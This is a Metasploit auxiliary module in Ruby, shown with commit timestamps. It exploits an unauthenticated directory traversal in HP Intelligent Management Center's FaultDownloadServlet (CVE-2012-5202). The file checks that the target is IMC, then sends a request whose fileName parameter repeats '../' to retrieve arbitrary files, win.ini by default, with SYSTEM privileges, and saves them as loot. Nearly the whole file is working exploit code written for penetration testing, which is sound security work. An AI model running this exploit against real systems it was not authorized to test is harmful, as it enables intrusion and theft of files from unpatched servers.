metasploit-framework/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet...

100 lines
3.0 KiB
Ruby
Raw Normal View History

2013-04-02 22:21:01 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-04-02 22:21:01 +00:00
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Intelligent Management FaultDownloadServlet Directory Traversal',
'Description' => %q{
This module exploits a lack of authentication and a directory traversal in HP
Intelligent Management, specifically in the FaultDownloadServlet, in order to
retrieve arbitrary files with SYSTEM privileges. This module has been tested
successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-5202' ],
[ 'OSVDB', '91027' ],
2013-08-30 21:28:54 +00:00
[ 'BID', '58675' ],
[ 'ZDI', '13-051' ]
2013-08-30 21:28:54 +00:00
]
))
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
2014-09-04 22:05:51 +00:00
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
2013-08-30 21:28:54 +00:00
# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
OptInt.new('DEPTH', [true, 'Traversal depth', 7])
])
2013-08-30 21:28:54 +00:00
end
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
def is_imc?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"),
'method' => 'GET'
})
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
return true
else
return false
end
end
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
def my_basename(filename)
return ::File.basename(filename.gsub(/\\/, "/"))
end
2013-04-05 09:02:59 +00:00
2013-08-30 21:28:54 +00:00
def run_host(ip)
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
if not is_imc?
vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
return
end
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
travs = ""
travs << "../" * datastore['DEPTH']
travs << datastore['FILEPATH']
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
vprint_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "tmp", "fault", "download"),
'method' => 'GET',
'vars_get' =>
{
'fileName' => travs
}
})
2013-04-02 22:21:01 +00:00
2013-08-30 21:28:54 +00:00
if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
contents = res.body
fname = my_basename(datastore['FILEPATH'])
path = store_loot(
'hp.imc.faultdownloadservlet',
'application/octet-stream',
ip,
contents,
fname
)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
else
vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
2013-04-02 22:21:01 +00:00
end